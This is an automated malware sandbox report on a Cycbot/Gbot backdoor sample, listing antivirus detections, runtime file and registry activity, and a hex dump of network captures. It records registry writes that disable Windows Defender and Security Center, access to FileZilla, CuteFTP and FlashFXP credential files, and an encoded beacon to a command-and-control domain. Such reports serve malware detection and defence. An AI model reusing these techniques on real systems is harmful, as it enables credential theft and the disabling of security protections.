Analysis Date2018-05-07 00:56:00
MD583157a64fa8573ad9d40749eba443ff2
SHA104ac1e0c781fb418265ecb2bdd02f17d86f523df

Static Details:

File typePE32 executable (GUI) Intel 80386, for MS Windows
PEhash
AVTrend MicroBKDR_CYCBOT.SMTE
AVFortinetW32/CYCBot.F!tr
AVCA (E-Trust Ino)Gen:Variant.Kazy.56036
AVRisingTrojan.Win32.Generic.12B751A9
AVNANOError Scanning File
AVEset (nod32)Win32/Kryptik.AAZR
AVK7Error Scanning File
AVMcafeeBackDoor-EXI.gen.ah
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997
AVSymantecBackdoor.Cycbot!gen10
AVBullGuardGen:Variant.Kazy.56036
AVWindows DefenderBackdoor:Win32/Cycbot.G
AVMalwareBytesTrojan.Dropper.PE4
AVPadvishNo Virus
AVF-SecureGen:Variant.Kazy.56036
AVClamAVNo Virus
AVAuthentiumW32/Goolbot.P.gen!Eldorado
AVMicroWorld (escan)Gen:Variant.Kazy.56036
AVAlwil (avast)Cycbot-SF [Trj]
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVTwisterNo Virus
AVDr. WebBackDoor.Gbot.2028
AVFrisk (f-prot)W32/Goolbot.P.gen!Eldorado
AVZillya!No Virus
AVAd-AwareGen:Variant.Kazy.56036
AVAvira (antivir)TR/Crypt.EPACK.Gen2
AVSUPERAntiSpywareTrojan.Agent/Gen-Kazy[Ex]
AVGrisoft (avg)Error Scanning File
AVBitDefenderGen:Variant.Kazy.56036
AV360 SafeNo Virus
AVIkarusVirus.Win32.Cryptor
AVEmsisoftGen:Variant.Kazy.56036
AVCAT (quickheal)Backdoor.Cycbot.B
AVArcabit (arcavir)Gen:Variant.Kazy.56036
AVKasperskyBackdoor.Win32.Gbot.qxd

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\04ac1e0c781fb418265ecb2bdd02f17d86f523df.exe

Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates MutexRasPbFile
Creates Mutex{B1D429DE-B782-4253-84AD-6E09A8438AD5}
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth ➝
1
RegistryHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start ➝
3
RegistryHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start ➝
3

Process
↳ C:\Users\Phil\AppData\Local\Temp\04ac1e0c781fb418265ecb2bdd02f17d86f523df.exe

Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates MutexRasPbFile

Process
↳ C:\Program Files (x86)\LP\0ADE\204F.tmp

Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates FileC:\Users\Phil\AppData\Local\Temp\HWID
Creates FileC:\Windows\wcx_ftp.ini
Creates FileC:\Users\Phil\AppData\Roaming\GHISLER\wcx_ftp.ini
Creates FileC:\Users\Phil\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
Creates FileC:\Users\Phil\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
Creates FileC:\Users\Phil\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
Creates FileC:\Users\Phil\AppData\Roaming\CuteFTP\sm.dat
Creates FileC:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
Creates FileC:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
Creates FileC:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
Creates FileC:\ProgramData\CuteFTP\sm.dat
Creates FileC:\Users\Phil\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
Creates FileC:\Users\Phil\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
Creates FileC:\Users\Phil\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
Creates FileC:\Users\Phil\AppData\Local\CuteFTP\sm.dat
Creates FileC:\Users\Phil\AppData\Roaming\FlashFXP\3\Sites.dat
Creates FileC:\Users\Phil\AppData\Roaming\FlashFXP\4\Sites.dat
Creates FileC:\Users\Phil\AppData\Roaming\FlashFXP\3\Quick.dat
Creates FileC:\Users\Phil\AppData\Roaming\FlashFXP\4\Quick.dat
Creates FileC:\Users\Phil\AppData\Roaming\FlashFXP\3\History.dat
Creates FileC:\Users\Phil\AppData\Roaming\FlashFXP\4\History.dat
Creates FileC:\ProgramData\FlashFXP\3\Sites.dat
Creates FileC:\ProgramData\FlashFXP\4\Sites.dat
Creates FileC:\ProgramData\FlashFXP\3\Quick.dat
Creates FileC:\ProgramData\FlashFXP\4\Quick.dat
Creates FileC:\ProgramData\FlashFXP\3\History.dat
Creates FileC:\ProgramData\FlashFXP\4\History.dat
Creates FileC:\Users\Phil\AppData\Local\FlashFXP\3\Sites.dat
Creates FileC:\Users\Phil\AppData\Local\FlashFXP\4\Sites.dat
Creates FileC:\Users\Phil\AppData\Local\FlashFXP\3\Quick.dat
Creates FileC:\Users\Phil\AppData\Local\FlashFXP\4\Quick.dat
Creates FileC:\Users\Phil\AppData\Local\FlashFXP\3\History.dat
Creates FileC:\Users\Phil\AppData\Local\FlashFXP\4\History.dat
Creates FileC:\Users\Phil\AppData\Roaming\FileZilla\sitemanager.xml
Creates FileC:\Users\Phil\AppData\Roaming\FileZilla\recentservers.xml
Creates FileC:\Users\Phil\AppData\Roaming\FileZilla\filezilla.xml
Creates FileC:\ProgramData\FileZilla\sitemanager.xml
Creates FileC:\ProgramData\FileZilla\recentservers.xml
Creates FileC:\ProgramData\FileZilla\filezilla.xml
Creates FileC:\Users\Phil\AppData\Local\FileZilla\sitemanager.xml
Creates FileC:\Users\Phil\AppData\Local\FileZilla\recentservers.xml
Creates FileC:\Users\Phil\AppData\Local\FileZilla\filezilla.xml
Creates FileC:\Users\Phil\AppData\Roaming\SharedSettings.ccs
Creates FileC:\Users\Phil\AppData\Roaming\SharedSettings.sqlite
Creates FileC:\ProgramData\SharedSettings.ccs
Creates FileC:\ProgramData\SharedSettings.sqlite
Creates FileC:\Users\Phil\AppData\Local\SharedSettings.ccs
Creates FileC:\Users\Phil\AppData\Local\SharedSettings.sqlite
Creates FileC:\Windows\32BitFtp.ini
RegistryHKEY_CURRENT_USER\Software\WinRAR\HWID ➝
{ADADB18D-F1D5-455B-A66A-537B53D44DFE}

Process
↳ C:\Users\Phil\AppData\Local\Temp\04ac1e0c781fb418265ecb2bdd02f17d86f523df.exe

Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates MutexRasPbFile

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f706361 332e6372 6c204854   GET /pca3.crl HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 636c6f73 650d0a41 63636570   on: close..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000040 (00064)   6e743a20 4d696372 6f736f66 742d4372   nt: Microsoft-Cr
0x00000050 (00080)   7970746f 4150492f 362e310d 0a486f73   yptoAPI/6.1..Hos
0x00000060 (00096)   743a2063 726c2e76 65726973 69676e2e   t: crl.verisign.
0x00000070 (00112)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f696d61 6765732f 70616765   GET /images/page
0x00000010 (00016)   732e6a70 673f7376 3d343139 2674713d   s.jpg?sv=419&tq=
0x00000020 (00032)   67775939 32773441 674d797a 46253242   gwY92w4AgMyzF%2B
0x00000030 (00048)   30686259 567a4738 38463664 67425142   0hbYVzG88F6dgBQB
0x00000040 (00064)   41365a47 5559796a 44325978 57492532   A6ZGUYyjD2YxWI%2
0x00000050 (00080)   42717442 64777830 4d524a35 514a5253   BqtBdwx0MRJ5QJRS
0x00000060 (00096)   3149494f 65324975 5a313848 326d4e6e   1IIOe2IuZ18H2mNn
0x00000070 (00112)   61756437 50363477 6541485a 67494852   aud7P64weAHZgIHR
0x00000080 (00128)   52733668 6d63646b 676b5a6f 69793959   Rs6hmcdkgkZoiy9Y
0x00000090 (00144)   41537359 59395478 6c536575 526a7347   ASsYY9TxlSeuRjsG
0x000000a0 (00160)   4c7a4136 61253242 35427836 456a4464   LzA6a%2B5Bx6EjDd
0x000000b0 (00176)   516a5966 43676842 7239494f 33414d68   QjYfCghBr9IO3AMh
0x000000c0 (00192)   6e344d6e 426a686d 464f7825 32466b25   n4MnBjhmFOx%2Fk%
0x000000d0 (00208)   32424277 74504c63 49625250 6d647739   2BBwtPLcIbRPmdw9
0x000000e0 (00224)   3458344b 66773750 6b696b63 71544c35   4X4Kfw7PkikcqTL5
0x000000f0 (00240)   67434779 376c4253 6b525275 755a466c   gCGy7lBSkRRuuZFl
0x00000100 (00256)   4b362532 426e2532 42334230 54414c6d   K6%2Bn%2B3B0TALm
0x00000110 (00272)   4f596c79 69333372 6b746848 2532464a   OYlyi33rkthH%2FJ
0x00000120 (00288)   496d7035 75515779 47253246 72204854   Imp5uQWyG%2Fr HT
0x00000130 (00304)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000150 (00336)   206a6f69 6e746865 6e657777 6f726c64    jointhenewworld
0x00000160 (00352)   6f726465 722e636f 6d0d0a41 63636570   order.com..Accep
0x00000170 (00368)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000180 (00384)   6e743a20 6368726f 6d652f39 2e300d0a   nt: chrome/9.0..
0x00000190 (00400)   0d0a                                  ..

0x00000000 (00000)   47455420 2f4d4645 77547a42 4e4d4573   GET /MFEwTzBNMEs
0x00000010 (00016)   77535441 4a426755 7244674d 43476755   wSTAJBgUrDgMCGgU
0x00000020 (00032)   41424254 53715a4d 47354d38 54413972   ABBTSqZMG5M8TA9r
0x00000030 (00048)   647a6b62 436e4e77 754d4164 35566751   dzkbCnNwuMAd5VgQ
0x00000040 (00064)   557a356d 70366e73 6d394576 4a6a6f25   Uz5mp6nsm9EvJjo%
0x00000050 (00080)   32465838 41556d37 25324250 53703530   2FX8AUm7%2BPSp50
0x00000060 (00096)   43454345 58655443 33492532 46762532   CECEXeTC3I%2Fv%2
0x00000070 (00112)   46253246 4a672532 426b4e37 6c546a38   F%2FJg%2BkN7lTj8
0x00000080 (00128)   25334420 48545450 2f312e31 0d0a436f   %3D HTTP/1.1..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000b0 (00176)   65722d41 67656e74 3a204d69 63726f73   er-Agent: Micros
0x000000c0 (00192)   6f66742d 43727970 746f4150 492f362e   oft-CryptoAPI/6.
0x000000d0 (00208)   310d0a48 6f73743a 2073662e 73796d63   1..Host: sf.symc
0x000000e0 (00224)   642e636f 6d0d0a0d 0a                  d.com....

0x00000000 (00000)   47455420 2f706b69 2f63726c 2f70726f   GET /pki/crl/pro
0x00000010 (00016)   64756374 732f6d69 63726f73 6f667472   ducts/microsoftr
0x00000020 (00032)   6f6f7463 6572742e 63726c20 48545450   ootcert.crl HTTP
0x00000030 (00048)   2f312e31 0d0a436f 6e6e6563 74696f6e   /1.1..Connection
0x00000040 (00064)   3a204b65 65702d41 6c697665 0d0a4163   : Keep-Alive..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000060 (00096)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000070 (00112)   2d437279 70746f41 50492f36 2e310d0a   -CryptoAPI/6.1..
0x00000080 (00128)   486f7374 3a206372 6c2e6d69 63726f73   Host: crl.micros
0x00000090 (00144)   6f66742e 636f6d0d 0a0d0a47 4554202f   oft.com....GET /
0x000000a0 (00160)   706b692f 63726c2f 70726f64 75637473   pki/crl/products
0x000000b0 (00176)   2f4d6963 436f6453 69675043 415f3038   /MicCodSigPCA_08
0x000000c0 (00192)   2d33312d 32303130 2e63726c 20485454   -31-2010.crl HTT
0x000000d0 (00208)   502f312e 310d0a43 6f6e6e65 6374696f   P/1.1..Connectio
0x000000e0 (00224)   6e3a204b 6565702d 416c6976 650d0a41   n: Keep-Alive..A
0x000000f0 (00240)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000100 (00256)   2d416765 6e743a20 4d696372 6f736f66   -Agent: Microsof
0x00000110 (00272)   742d4372 7970746f 4150492f 362e310d   t-CryptoAPI/6.1.
0x00000120 (00288)   0a486f73 743a2063 726c2e6d 6963726f   .Host: crl.micro
0x00000130 (00304)   736f6674 2e636f6d 0d0a0d0a            soft.com....

0x00000000 (00000)   47455420 2f4d4645 77547a42 4e4d4573   GET /MFEwTzBNMEs
0x00000010 (00016)   77535441 4a426755 7244674d 43476755   wSTAJBgUrDgMCGgU
0x00000020 (00032)   41424252 49743252 4a383958 25324225   ABBRIt2RJ89X%2B%
0x00000030 (00048)   32426845 7a716f42 65516738 50796d51   2BhEzqoBeQg8PymQ
0x00000040 (00064)   32555151 55414e68 61544358 42497557   2UQQUANhaTCXBIuW
0x00000050 (00080)   4c4d6539 74757650 4d58796e 78445745   LMe9tuvPMXynxDWE
0x00000060 (00096)   43454756 534a7547 794c686a 68575138   CEGVSJuGyLhjhWQ8
0x00000070 (00112)   70686177 69353177 25334420 48545450   phawi51w%3D HTTP
0x00000080 (00128)   2f312e31 0d0a436f 6e6e6563 74696f6e   /1.1..Connection
0x00000090 (00144)   3a204b65 65702d41 6c697665 0d0a4163   : Keep-Alive..Ac
0x000000a0 (00160)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000b0 (00176)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x000000c0 (00192)   2d437279 70746f41 50492f36 2e310d0a   -CryptoAPI/6.1..
0x000000d0 (00208)   486f7374 3a206f63 73702e76 65726973   Host: ocsp.veris
0x000000e0 (00224)   69676e2e 636f6d0d 0a0d0a              ign.com....

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 37353a35 3335370d 0a0d0a3c   00.175:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a626461 31626366 622d6333 64372d34   :bda1bcfb-c3d7-4
0x00000280 (00640)   6234372d 62623962 2d383130 35646665   b47-bb9b-8105dfe
0x00000290 (00656)   31343063 373c2f77 73613a4d 65737361   140c7</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a3562 30656434   >urn:uuid:5b0ed4
0x00000340 (00832)   31642d66 6263362d 34626365 2d616430   1d-fbc6-4bce-ad0
0x00000350 (00848)   612d6561 37653066 61333933 61313c2f   a-ea7e0fa393a1</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 37303a35 3335370d 0a0d0a3c   00.170:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a633863 64326163 362d3463 31372d34   :c8cd2ac6-4c17-4
0x00000280 (00640)   6333652d 38386662 2d643363 34663366   c3e-88fb-d3c4f3f
0x00000290 (00656)   33373731 353c2f77 73613a4d 65737361   37715</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a3736 64623734   >urn:uuid:76db74
0x00000340 (00832)   31642d32 3265352d 34303061 2d616234   1d-22e5-400a-ab4
0x00000350 (00848)   332d3464 38343135 62313230 35383c2f   3-4d8415b12058</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>

0x00000000 (00000)   47455420 2f4d4645 77547a42 4e4d4573   GET /MFEwTzBNMEs
0x00000010 (00016)   77535441 4a426755 7244674d 43476755   wSTAJBgUrDgMCGgU
0x00000020 (00032)   41424253 70754345 33614b33 4769765a   ABBSpuCE3aK3GivZ
0x00000030 (00048)   507a4751 4a364c35 4252795a 6f667751   PzGQJ6L5BRyZofwQ
0x00000040 (00064)   556c3942 7271435a 77794b45 2532466c   Ul9BrqCZwyKE%2Fl
0x00000050 (00080)   4238494c 6351316d 36536848 76494345   B8ILcQ1m6ShHvICE
0x00000060 (00096)   414b516c 6c36524d 30444e70 6d4e4d37   AKQll6RM0DNpmNM7
0x00000070 (00112)   7a483325 32465163 25334420 48545450   zH3%2FQc%3D HTTP
0x00000080 (00128)   2f312e31 0d0a436f 6e6e6563 74696f6e   /1.1..Connection
0x00000090 (00144)   3a20636c 6f73650d 0a416363 6570743a   : close..Accept:
0x000000a0 (00160)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000000b0 (00176)   3a204d69 63726f73 6f66742d 43727970   : Microsoft-Cryp
0x000000c0 (00192)   746f4150 492f362e 310d0a48 6f73743a   toAPI/6.1..Host:
0x000000d0 (00208)   206f6373 702e7665 72697369 676e2e63    ocsp.verisign.c
0x000000e0 (00224)   6f6d0d0a 0d0a6174 696f6e2f 706b6978   om....ation/pkix
0x000000f0 (00240)   2d63726c 0d0a0d0a 3082042d 30820396   -crl....0..-0...
0x00000100 (00256)   300d0609 2a864886 f70d0101 0505       0...*.H.......

0x00000000 (00000)   47455420 2f4d4645 77547a42 4e4d4573   GET /MFEwTzBNMEs
0x00000010 (00016)   77535441 4a426755 7244674d 43476755   wSTAJBgUrDgMCGgU
0x00000020 (00032)   41424253 3536624b 48416f55 44253242   ABBS56bKHAoUD%2B
0x00000030 (00048)   4f796c25 3242304c 68506739 4a787951   Oyl%2B0LhPg9JxyQ
0x00000040 (00064)   6d346751 5566394e 6c70384c 64374c76   m4gQUf9Nlp8Ld7Lv
0x00000050 (00080)   774d416e 7a517a6e 36417138 7a4d544d   wMAnzQzn6Aq8zMTM
0x00000060 (00096)   43454649 4135616f 6c567677 61687532   CEFIA5aolVvwahu2
0x00000070 (00112)   57796452 4c4d3863 25334420 48545450   WydRLM8c%3D HTTP
0x00000080 (00128)   2f312e31 0d0a436f 6e6e6563 74696f6e   /1.1..Connection
0x00000090 (00144)   3a20636c 6f73650d 0a416363 6570743a   : close..Accept:
0x000000a0 (00160)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000000b0 (00176)   3a204d69 63726f73 6f66742d 43727970   : Microsoft-Cryp
0x000000c0 (00192)   746f4150 492f362e 310d0a48 6f73743a   toAPI/6.1..Host:
0x000000d0 (00208)   206f6373 702e7665 72697369 676e2e63    ocsp.verisign.c
0x000000e0 (00224)   6f6d0d0a 0d0a                         om....


Strings